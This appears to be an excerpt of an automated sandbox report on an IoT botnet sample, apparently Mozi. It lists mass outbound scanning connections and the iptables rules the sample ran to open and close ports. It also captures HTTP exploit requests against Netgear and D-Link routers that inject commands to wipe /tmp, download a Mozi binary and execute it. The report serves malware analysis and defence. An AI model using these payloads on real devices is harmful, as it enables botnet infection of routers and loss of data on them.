Source: global traffic	TCP traffic: 192.168.2.20:58826 -> 115.68.81.229:5555
Source: global traffic	TCP traffic: 192.168.2.20:55466 -> 63.119.139.18:52869
Source: global traffic	TCP traffic: 192.168.2.20:37268 -> 128.74.254.8:81
Source: global traffic	TCP traffic: 192.168.2.20:39216 -> 18.85.1.6:8080
Source: global traffic	TCP traffic: 192.168.2.20:39354 -> 50.117.194.170:81
Source: global traffic	TCP traffic: 192.168.2.20:50174 -> 194.203.125.103:37215
Source: global traffic	TCP traffic: 192.168.2.20:49104 -> 13.76.121.137:7574
Source: global traffic	TCP traffic: 192.168.2.20:52786 -> 209.110.181.128:5555
Source: global traffic	TCP traffic: 192.168.2.20:40564 -> 191.199.26.110:52869
Source: global traffic	TCP traffic: 192.168.2.20:49016 -> 161.225.141.251:52869
Source: global traffic	TCP traffic: 192.168.2.20:43880 -> 90.245.97.44:5555
Source: global traffic	TCP traffic: 192.168.2.20:57830 -> 113.102.129.74:8080
Source: global traffic	TCP traffic: 192.168.2.20:49722 -> 220.5.66.90:7574
Source: global traffic	TCP traffic: 192.168.2.20:42298 -> 46.218.39.117:8080
Source: global traffic	TCP traffic: 192.168.2.20:57694 -> 121.2.76.155:8080
Source: global traffic	TCP traffic: 192.168.2.20:60814 -> 116.172.79.18:37215
Source: global traffic	TCP traffic: 192.168.2.20:50774 -> 118.206.103.100:52869
Source: global traffic	TCP traffic: 192.168.2.20:33334 -> 194.83.51.26:8080
Source: global traffic	TCP traffic: 192.168.2.20:38302 -> 203.160.221.66:52869
Source: global traffic	TCP traffic: 192.168.2.20:57940 -> 1.121.96.1:81
Source: global traffic	TCP traffic: 192.168.2.20:48880 -> 113.220.235.137:5555
Source: global traffic	TCP traffic: 192.168.2.20:41484 -> 123.247.45.252:8080
Source: global traffic	TCP traffic: 192.168.2.20:47310 -> 151.169.69.96:52869
Source: global traffic	TCP traffic: 192.168.2.20:32952 -> 186.183.85.110:8080
Source: global traffic	TCP traffic: 192.168.2.20:48128 -> 4.105.129.133:8080
Source: global traffic	TCP traffic: 192.168.2.20:60652 -> 101.108.160.68:7574
Source: global traffic	TCP traffic: 192.168.2.20:56192 -> 49.41.213.146:37215
Source: global traffic	TCP traffic: 192.168.2.20:44982 -> 30.2.20.173:5555
Source: global traffic	TCP traffic: 192.168.2.20:54582 -> 103.148.212.55:37215
Source: global traffic	TCP traffic: 192.168.2.20:55776 -> 82.218.21.170:5555
Source: global traffic	TCP traffic: 192.168.2.20:49832 -> 67.136.232.53:81
Source: global traffic	TCP traffic: 192.168.2.20:45456 -> 139.130.197.234:81
Source: global traffic	TCP traffic: 192.168.2.20:39778 -> 66.231.13.119:37215
Source: global traffic	TCP traffic: 192.168.2.20:34896 -> 114.154.250.15:37215
Source: global traffic	TCP traffic: 192.168.2.20:56176 -> 222.42.34.127:8080
Source: global traffic	TCP traffic: 192.168.2.20:45010 -> 64.6.129.201:8080
Source: global traffic	TCP traffic: 192.168.2.20:33090 -> 201.46.243.205:5555
Source: global traffic	TCP traffic: 192.168.2.20:54022 -> 121.10.6.126:37215
Source: global traffic	TCP traffic: 192.168.2.20:46364 -> 1.41.63.236:8443
Source: global traffic	TCP traffic: 192.168.2.20:44732 -> 52.241.184.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:54896 -> 174.159.13.210:81
Source: global traffic	TCP traffic: 192.168.2.20:60782 -> 35.205.25.55:52869
Source: global traffic	TCP traffic: 192.168.2.20:42086 -> 31.127.22.163:49152
Source: global traffic	TCP traffic: 192.168.2.20:49844 -> 40.55.105.19:8443
Source: global traffic	TCP traffic: 192.168.2.20:56240 -> 139.49.163.59:52869
Source: global traffic	TCP traffic: 192.168.2.20:35598 -> 67.93.178.237:52869
Source: global traffic	TCP traffic: 192.168.2.20:36694 -> 134.89.250.10:8443
Source: global traffic	TCP traffic: 192.168.2.20:33240 -> 20.134.119.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:54778 -> 20.124.162.183:8080
Source: global traffic	TCP traffic: 192.168.2.20:33658 -> 2.185.196.129:49152
Source: global traffic	TCP traffic: 192.168.2.20:38818 -> 65.18.254.63:8080
Source: global traffic	TCP traffic: 192.168.2.20:60582 -> 54.185.240.6:8443
Source: global traffic	TCP traffic: 192.168.2.20:55772 -> 75.69.136.4:5555
Source: global traffic	TCP traffic: 192.168.2.20:48024 -> 51.203.73.42:8443
Source: global traffic	TCP traffic: 192.168.2.20:54130 -> 197.124.118.3:37215
Source: global traffic	TCP traffic: 192.168.2.20:37378 -> 214.227.33.211:7574
Source: global traffic	TCP traffic: 192.168.2.20:53398 -> 119.92.5.81:81
Source: global traffic	TCP traffic: 192.168.2.20:34966 -> 76.65.52.254:8080
Source: global traffic	TCP traffic: 192.168.2.20:50700 -> 79.102.239.202:7574
Source: global traffic	TCP traffic: 192.168.2.20:56052 -> 164.204.0.203:8080
Source: global traffic	TCP traffic: 192.168.2.20:35204 -> 154.190.122.88:49152
Source: global traffic	TCP traffic: 192.168.2.20:45824 -> 57.164.19.75:49152
Source: global traffic	TCP traffic: 192.168.2.20:52868 -> 64.4.79.9:8080
Source: global traffic	TCP traffic: 192.168.2.20:49928 -> 36.184.218.26:37215
Source: global traffic	TCP traffic: 192.168.2.20:44348 -> 158.253.181.50:8080
Source: global traffic	TCP traffic: 192.168.2.20:58166 -> 195.46.141.157:7574
Source: global traffic	TCP traffic: 192.168.2.20:56270 -> 139.68.173.122:7574
Source: global traffic	TCP traffic: 192.168.2.20:37010 -> 120.161.181.26:37215
Source: global traffic	TCP traffic: 192.168.2.20:49240 -> 199.133.40.189:8080
Source: global traffic	TCP traffic: 192.168.2.20:35188 -> 174.149.62.131:7574
Source: global traffic	TCP traffic: 192.168.2.20:52546 -> 124.85.154.4:5555
Source: global traffic	TCP traffic: 192.168.2.20:49494 -> 126.6.39.232:5555
Source: global traffic	TCP traffic: 192.168.2.20:54438 -> 90.8.126.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:39510 -> 145.28.157.72:5555
Source: global traffic	TCP traffic: 192.168.2.20:44804 -> 145.143.20.200:8080
Source: global traffic	TCP traffic: 192.168.2.20:58322 -> 114.238.112.196:52869
Source: global traffic	TCP traffic: 192.168.2.20:41206 -> 111.205.48.104:49152
Source: global traffic	TCP traffic: 192.168.2.20:56846 -> 33.128.39.87:37215
Source: global traffic	TCP traffic: 192.168.2.20:49548 -> 216.251.87.103:8080
Source: global traffic	TCP traffic: 192.168.2.20:59488 -> 73.2.23.66:49152
Source: global traffic	TCP traffic: 192.168.2.20:43724 -> 69.68.78.9:8080
Source: global traffic	TCP traffic: 192.168.2.20:58448 -> 11.149.77.64:5555
Source: global traffic	TCP traffic: 192.168.2.20:37030 -> 11.16.15.161:7574
Source: global traffic	TCP traffic: 192.168.2.20:41248 -> 68.179.189.189:52869
Source: global traffic	TCP traffic: 192.168.2.20:58532 -> 6.60.84.48:49152
Source: global traffic	TCP traffic: 192.168.2.20:36830 -> 221.116.192.198:8080
Source: global traffic	TCP traffic: 192.168.2.20:50814 -> 69.79.211.26:81
Source: global traffic	TCP traffic: 192.168.2.20:58462 -> 160.135.77.199:8080
Source: global traffic	TCP traffic: 192.168.2.20:52936 -> 164.95.36.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:52276 -> 132.1.164.140:5555
Source: global traffic	TCP traffic: 192.168.2.20:40696 -> 75.154.151.151:8443
Source: global traffic	TCP traffic: 192.168.2.20:51414 -> 130.90.198.10:7574
Source: global traffic	TCP traffic: 192.168.2.20:54374 -> 138.68.113.164:8443
Source: global traffic	TCP traffic: 192.168.2.20:34274 -> 54.177.250.248:81
Source: global traffic	TCP traffic: 192.168.2.20:40648 -> 160.8.93.233:8443
Source: global traffic	TCP traffic: 192.168.2.20:59908 -> 178.123.18.214:37215
Source: global traffic	TCP traffic: 192.168.2.20:50452 -> 131.228.7.91:52869
Source: global traffic	TCP traffic: 192.168.2.20:55162 -> 181.221.30.207:7574
Source: global traffic	TCP traffic: 192.168.2.20:46854 -> 55.169.99.112:49152
Source: global traffic	TCP traffic: 192.168.2.20:54246 -> 37.117.214.1:8080
Source: global traffic	TCP traffic: 192.168.2.20:39974 -> 80.219.251.133:52869
Source: global traffic	TCP traffic: 192.168.2.20:33450 -> 69.12.226.143:81
Source: global traffic	TCP traffic: 192.168.2.20:33268 -> 76.213.165.145:49152
Source: global traffic	TCP traffic: 192.168.2.20:40022 -> 65.145.116.36:8080
Source: global traffic	TCP traffic: 192.168.2.20:52920 -> 60.5.129.42:8080
Source: global traffic	TCP traffic: 192.168.2.20:39982 -> 50.163.12.13:8443
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 146.41.13.62:5555
Source: global traffic	TCP traffic: 192.168.2.20:36400 -> 137.49.209.45:7574
Source: global traffic	TCP traffic: 192.168.2.20:47064 -> 70.132.111.66:37215
Source: global traffic	TCP traffic: 192.168.2.20:57098 -> 123.138.120.67:52869
Source: global traffic	TCP traffic: 192.168.2.20:36650 -> 55.239.199.186:8443
Source: global traffic	TCP traffic: 192.168.2.20:52960 -> 117.35.249.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:56046 -> 131.78.144.55:7574
Source: global traffic	TCP traffic: 192.168.2.20:41090 -> 74.120.254.188:81
Source: global traffic	TCP traffic: 192.168.2.20:44662 -> 2.216.247.11:37215
Source: global traffic	TCP traffic: 192.168.2.20:57762 -> 38.214.49.224:5555
Source: global traffic	TCP traffic: 192.168.2.20:40068 -> 197.42.173.187:5555
Source: global traffic	TCP traffic: 192.168.2.20:54998 -> 184.102.137.171:8443
Source: global traffic	TCP traffic: 192.168.2.20:36676 -> 163.90.78.111:52869
Source: global traffic	TCP traffic: 192.168.2.20:53300 -> 120.239.0.46:37215
Source: global traffic	TCP traffic: 192.168.2.20:46448 -> 202.146.192.67:8443
Source: global traffic	TCP traffic: 192.168.2.20:44270 -> 136.17.183.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:47752 -> 165.0.97.192:7574
Source: global traffic	TCP traffic: 192.168.2.20:35284 -> 178.58.212.116:8080
Source: global traffic	TCP traffic: 192.168.2.20:45608 -> 57.44.164.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:43716 -> 108.148.40.172:81
Source: global traffic	TCP traffic: 192.168.2.20:59424 -> 221.222.213.136:37215
Source: global traffic	TCP traffic: 192.168.2.20:40884 -> 27.232.91.39:7574
Source: global traffic	TCP traffic: 192.168.2.20:50102 -> 222.145.19.211:7574
Source: global traffic	TCP traffic: 192.168.2.20:55268 -> 221.17.206.67:8080
Source: global traffic	TCP traffic: 192.168.2.20:41272 -> 47.230.160.237:8080
Source: global traffic	TCP traffic: 192.168.2.20:49292 -> 175.59.180.182:8080
Source: global traffic	TCP traffic: 192.168.2.20:51664 -> 31.145.88.88:5555
Source: global traffic	TCP traffic: 192.168.2.20:40566 -> 60.119.0.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:55968 -> 218.182.128.219:49152
Source: global traffic	TCP traffic: 192.168.2.20:51464 -> 191.161.67.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:39428 -> 28.252.213.100:81
Source: global traffic	TCP traffic: 192.168.2.20:52486 -> 188.49.215.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:51178 -> 101.14.201.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:41060 -> 112.98.144.186:5555
Source: global traffic	TCP traffic: 192.168.2.20:57304 -> 219.172.189.248:8080
Source: global traffic	TCP traffic: 192.168.2.20:60502 -> 220.7.231.110:8080
Source: global traffic	TCP traffic: 192.168.2.20:44498 -> 173.229.39.3:81
Source: global traffic	TCP traffic: 192.168.2.20:34544 -> 179.177.100.169:81
Source: global traffic	TCP traffic: 192.168.2.20:41018 -> 144.0.182.62:37215
Source: global traffic	TCP traffic: 192.168.2.20:37776 -> 204.223.72.227:81
Source: global traffic	TCP traffic: 192.168.2.20:44130 -> 49.200.13.47:7574
Source: global traffic	TCP traffic: 192.168.2.20:39614 -> 218.145.20.192:81
Source: global traffic	TCP traffic: 192.168.2.20:47752 -> 171.158.205.147:81
Source: global traffic	TCP traffic: 192.168.2.20:42876 -> 199.83.99.48:7574
Source: global traffic	TCP traffic: 192.168.2.20:47020 -> 24.244.200.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:59912 -> 143.44.220.86:52869
Source: global traffic	TCP traffic: 192.168.2.20:37316 -> 218.34.244.171:8080
Source: global traffic	TCP traffic: 192.168.2.20:60112 -> 219.15.149.67:81
Source: global traffic	TCP traffic: 192.168.2.20:36974 -> 159.212.6.68:49152
Source: global traffic	TCP traffic: 192.168.2.20:52804 -> 89.179.8.221:37215
Source: global traffic	TCP traffic: 192.168.2.20:41346 -> 54.241.53.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:51258 -> 203.182.49.38:81
Source: global traffic	TCP traffic: 192.168.2.20:34910 -> 96.0.134.167:52869
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 25.84.54.191:49152
Source: global traffic	TCP traffic: 192.168.2.20:34006 -> 132.204.24.45:81
Source: global traffic	TCP traffic: 192.168.2.20:42814 -> 77.146.207.6:5555
Source: global traffic	TCP traffic: 192.168.2.20:54740 -> 70.193.124.115:8080
Source: global traffic	TCP traffic: 192.168.2.20:40672 -> 22.215.56.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:59510 -> 79.233.156.161:81
Source: global traffic	TCP traffic: 192.168.2.20:35900 -> 131.164.56.28:49152
Source: global traffic	TCP traffic: 192.168.2.20:41678 -> 94.105.143.222:52869
Source: global traffic	TCP traffic: 192.168.2.20:33806 -> 42.240.2.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:45322 -> 82.248.38.210:52869
Source: global traffic	TCP traffic: 192.168.2.20:38978 -> 86.42.21.77:8080
Source: global traffic	TCP traffic: 192.168.2.20:41156 -> 82.166.160.42:8080
Source: global traffic	TCP traffic: 192.168.2.20:55702 -> 115.164.165.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:41750 -> 125.107.95.242:8443
Source: global traffic	TCP traffic: 192.168.2.20:45732 -> 158.221.123.193:8080
Source: global traffic	TCP traffic: 192.168.2.20:42202 -> 45.6.47.21:37215
Source: global traffic	TCP traffic: 192.168.2.20:42140 -> 108.113.55.135:37215
Source: global traffic	TCP traffic: 192.168.2.20:45128 -> 45.223.245.22:5555
Source: global traffic	TCP traffic: 192.168.2.20:41386 -> 29.165.152.160:81
Source: global traffic	TCP traffic: 192.168.2.20:33734 -> 58.42.142.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:35364 -> 69.177.159.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:40160 -> 39.137.251.253:81
Source: global traffic	TCP traffic: 192.168.2.20:50860 -> 97.240.224.79:5555
Source: global traffic	TCP traffic: 192.168.2.20:52252 -> 67.132.101.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:43296 -> 191.69.17.65:5555
Source: global traffic	TCP traffic: 192.168.2.20:33154 -> 73.150.235.205:37215
Source: global traffic	TCP traffic: 192.168.2.20:40724 -> 171.240.208.62:8080
Source: global traffic	TCP traffic: 192.168.2.20:35514 -> 22.30.91.157:37215
Source: global traffic	TCP traffic: 192.168.2.20:40068 -> 208.11.186.103:49152
Source: global traffic	TCP traffic: 192.168.2.20:58650 -> 221.170.9.187:8443
Source: global traffic	TCP traffic: 192.168.2.20:53848 -> 75.134.61.79:8443
Source: global traffic	TCP traffic: 192.168.2.20:48944 -> 170.143.242.18:8443
Source: global traffic	TCP traffic: 192.168.2.20:55926 -> 198.64.242.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:60362 -> 166.79.50.7:5555
Source: global traffic	TCP traffic: 192.168.2.20:52474 -> 189.159.1.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:35372 -> 126.218.25.66:81
Source: global traffic	TCP traffic: 192.168.2.20:54260 -> 89.61.117.218:8443
Source: global traffic	TCP traffic: 192.168.2.20:48708 -> 9.206.51.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:44570 -> 119.15.221.144:81
Source: global traffic	TCP traffic: 192.168.2.20:37366 -> 180.190.249.44:49152
Source: global traffic	TCP traffic: 192.168.2.20:44712 -> 69.178.186.109:81
Source: global traffic	TCP traffic: 192.168.2.20:47922 -> 55.102.201.253:81
Source: global traffic	TCP traffic: 192.168.2.20:46694 -> 168.216.111.161:37215
Source: global traffic	TCP traffic: 192.168.2.20:37238 -> 1.207.152.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:59336 -> 50.70.173.82:37215
Source: global traffic	TCP traffic: 192.168.2.20:45268 -> 78.196.185.102:7574
Source: global traffic	TCP traffic: 192.168.2.20:34614 -> 220.172.15.204:7574
Source: global traffic	TCP traffic: 192.168.2.20:51434 -> 155.201.44.186:49152
Source: global traffic	TCP traffic: 192.168.2.20:50938 -> 139.84.176.29:7574
Source: global traffic	TCP traffic: 192.168.2.20:48766 -> 121.134.144.130:8443
Source: global traffic	TCP traffic: 192.168.2.20:38460 -> 3.106.131.99:49152
Source: global traffic	TCP traffic: 192.168.2.20:48356 -> 106.201.55.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:51430 -> 104.218.87.244:81
Source: global traffic	TCP traffic: 192.168.2.20:33508 -> 139.93.154.170:49152
Source: global traffic	TCP traffic: 192.168.2.20:47218 -> 61.193.135.39:52869
Source: global traffic	TCP traffic: 192.168.2.20:48782 -> 36.13.133.207:5555
Source: global traffic	TCP traffic: 192.168.2.20:45878 -> 82.109.64.3:52869
Source: global traffic	TCP traffic: 192.168.2.20:33012 -> 104.178.119.156:52869
Source: global traffic	TCP traffic: 192.168.2.20:44216 -> 169.209.56.181:81
Source: global traffic	TCP traffic: 192.168.2.20:60430 -> 217.89.51.86:81
Source: global traffic	TCP traffic: 192.168.2.20:57172 -> 30.177.86.43:8443
Source: global traffic	TCP traffic: 192.168.2.20:59448 -> 90.207.33.129:8080
Source: global traffic	TCP traffic: 192.168.2.20:42788 -> 178.244.39.81:8443
Source: global traffic	TCP traffic: 192.168.2.20:40106 -> 88.61.157.84:7574
Source: global traffic	TCP traffic: 192.168.2.20:58166 -> 194.114.33.228:49152

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4637)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT			Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.201.250.66:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 217.182.243.67:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 